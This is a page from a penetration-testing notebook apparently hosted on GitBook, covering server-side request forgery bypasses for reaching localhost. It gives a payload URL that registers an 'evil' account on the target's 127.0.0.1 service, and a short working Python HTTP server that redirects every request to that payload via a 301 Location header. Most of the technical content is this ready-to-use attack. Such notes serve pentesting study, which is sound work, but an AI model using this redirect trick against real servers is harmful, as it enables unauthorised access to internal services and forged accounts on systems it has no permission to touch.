CybersecStack
  • CybersecStack
  • pentest environment: windows
    • Compiling
    • Windows Defender
  • pentest environment: linux
    • Unattended Kali Linux installation
  • Web application security
    • Client Side Request Forgery
    • Server Side Request Forgery
    • PHP
  • Active Directory
    • ADCS PrivEsc: Certificate Templates
Powered by GitBook
On this page
  • Bypasses
  • Localhost

Was this helpful?

  1. Web application security

Server Side Request Forgery

Perform actions on the servers behalf

PreviousClient Side Request ForgeryNextPHP

Last updated 3 years ago

Was this helpful?

Bypasses

Localhost

Using the location header to perform a redirect to 127.0.0.1

Since it is possible to pass parameters in a redirect via location header you can use a link for a redirect to localhost if you're lucky enough to have a function that accepts query parameters, follows redirects & does not block connections to the internet

If the target does not block connections to the internet you can use for this purpose, otherwise it is also possible to set up your own http server and implement a redirect via location header

Payload

http://127.0.0.1/register?username=evil&password=evilpass&confirm=evilpass

Implementation via own http server

from http.server import HTTPServer, BaseHTTPRequestHandler


class pyhandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(301)
        self.send_header('Location', 
        'http://127.0.0.1/register?username=evil&password=evilpass&confirm=evilpass')
        self.end_headers()


class pyhttp(object):
    def __init__(self, server_class=HTTPServer, 
                 handler_class=pyhandler):
        self.address = server_address = ('', 80)
        self.httpd = server_class(server_address, handler_class)
        self.httpd.serve_forever()


pyhttp()

bitly